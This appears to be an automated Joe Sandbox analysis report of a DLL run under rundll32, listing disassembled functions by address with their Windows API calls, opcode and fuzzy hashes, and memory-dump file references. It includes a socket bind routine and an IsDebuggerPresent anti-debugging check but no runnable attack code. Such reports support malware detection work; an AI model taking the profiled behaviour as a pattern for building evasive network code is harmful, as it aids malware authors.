LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
GlobalLock.KERNEL32 ref: 1002AE6F
_memset.LIBCMT ref: 1002AE89
LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002E595

Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F

___sbh_find_block.LIBCMT ref: 1002E5A0
___sbh_free_block.LIBCMT ref: 1002E5AF
RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100036BB

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Strings

+';, xrefs: 100036A0

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: +';
API String ID: 501242067-2694261586
Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9

_malloc.LIBCMT ref: 100034B7

Strings

+';, xrefs: 10003440

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _malloc
String ID: +';
API String ID: 1579825452-2694261586
Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 10024BD7

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66

Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
String ID:
API String ID: 1104862767-0
Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memcpy_s.LIBCMT ref: 1001FBE6

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 1002B0C2

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000800B

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100236ED

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15

Uniqueness

Uniqueness Score: -1.00%

Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 1003C809
___getlocaleinfo.LIBCMT ref: 1003C81E
___getlocaleinfo.LIBCMT ref: 1003C833
___getlocaleinfo.LIBCMT ref: 1003C848
___getlocaleinfo.LIBCMT ref: 1003C860
___getlocaleinfo.LIBCMT ref: 1003C875
___getlocaleinfo.LIBCMT ref: 1003C887
___getlocaleinfo.LIBCMT ref: 1003C89C
___getlocaleinfo.LIBCMT ref: 1003C8B4
___getlocaleinfo.LIBCMT ref: 1003C8C9

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,?), ref: 10001194
_memset.LIBCMT ref: 100011A8
htonl.WS2_32(00000000), ref: 100011C1
htons.WS2_32(?), ref: 100011D5
socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
bind.WS2_32(?,?,00000010), ref: 10001210
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 100212CD

Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
__snwprintf_s.LIBCMT ref: 1002131A
LoadLibraryA.KERNEL32(?), ref: 10021355

Strings

LOC, xrefs: 100212C5

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1016519223-519433814
Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 10031D3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
